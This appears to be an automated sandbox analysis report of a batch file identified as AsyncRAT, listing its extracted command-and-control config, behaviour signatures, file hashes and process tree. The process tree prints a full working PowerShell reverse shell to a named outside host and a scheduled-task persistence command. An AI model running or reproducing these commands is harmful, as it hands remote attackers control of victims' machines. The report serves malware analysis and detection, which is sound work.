Overview

overview

10

Static

static

1

create.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-11-2024 23:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    create.bat

  • Size

    953B

  • MD5

    a34e9091b3cb1b1fddb64dd1e6eafe8b

  • SHA1

    73a9ce1190dbf81871d72cc98b7d81487bad17dc

  • SHA256

    b79c63a1f5777b977a48085de65f8041d1d6b2d5d569224b0f81b343578f1803

  • SHA512

    65391766927605aef01be482578b0f11fc9a9dfd0ee0b0a62ff1df6d07346a4b6d5a0d7409983f3fcd7b8a98e5376fd15bc8961b477be683e88ddf8e5619d0b7

Score
10/10
asyncratdefaultexecutionrat

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

technical-southwest.gl.at.ply.gg:58694

Attributes
  • delay

    1

  • install

    true

  • install_file

    WINDOWS.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\create.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:796
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoProfile -ExecutionPolicy Bypass -Command "$LHOST = 'radio-ebay.gl.at.ply.gg'; $LPORT = 10404; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) } catch { $_ }; $StreamWriter.Write('$Output`n'); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1428
      • C:\Users\Admin\Desktop\Loader.exe
        "C:\Users\Admin\Desktop\Loader.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3132
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4692
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"'
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:468
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3F41.tmp.bat""
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4536
          • C:\Windows\system32\timeout.exe
            timeout 3
            5⤵
            • Delays execution with timeout.exe
            PID:2612
          • C:\Users\Admin\AppData\Roaming\WINDOWS.exe
            "C:\Users\Admin\AppData\Roaming\WINDOWS.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2396

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dtbr35us.vli.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\tmp3F41.tmp.bat
    Filesize

    151B

    MD5

    1cf76cd1858f9e1dc9434fbf2fd787ae

    SHA1

    17f8a55e0aa203e39ea76a4890e156a94587ff6e

    SHA256

    4aee591a9206c96114c48d3f91e8d32f681405fffdcde86df3b9d2c6dc32fafb

    SHA512

    1096173f4e0a571af6246480d97f5aef91515d6dce869f12ed3a08f84f94054cc9fc5f2aa2895549dcb98b853872e89cb00f54fb8ae9b89c23780fa208f71502

    Download Submit

  • C:\Users\Admin\Desktop\Loader.exe
    Filesize

    63KB

    MD5

    7ceb11ebb7a55e33a82bc3b66f554e79

    SHA1

    8dfd574ad06ded662d92d81b72f14c1914ac45b5

    SHA256

    aea3e89e45a33441bcd06c990282f8601eb960a641c611222dce2fe09685e603

    SHA512

    d8cd7af50996015163c8926fc7b6df6a6e2c0b3f6c8fcff37cad5b72fed115f7134723d99f61a20576b83e67107a3a410f5ef2312191446b3d0759cb739e6ccd

    Download Submit

  • memory/1428-11-0x00007FFF76D70000-0x00007FFF77831000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1428-12-0x00007FFF76D70000-0x00007FFF77831000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1428-13-0x00007FFF76D73000-0x00007FFF76D75000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1428-15-0x00007FFF76D70000-0x00007FFF77831000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1428-14-0x00007FFF76D70000-0x00007FFF77831000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1428-16-0x00007FFF76D70000-0x00007FFF77831000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1428-0-0x00007FFF76D73000-0x00007FFF76D75000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1428-1-0x000001FAF53C0000-0x000001FAF53E2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1428-39-0x00007FFF76D70000-0x00007FFF77831000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3132-28-0x0000000000AD0000-0x0000000000AE6000-memory.dmp

    Filesize

    88KB

    Download

  • memory/3132-29-0x00007FFF76D70000-0x00007FFF77831000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3132-34-0x00007FFF76D70000-0x00007FFF77831000-memory.dmp

    Filesize

    10.8MB

    Download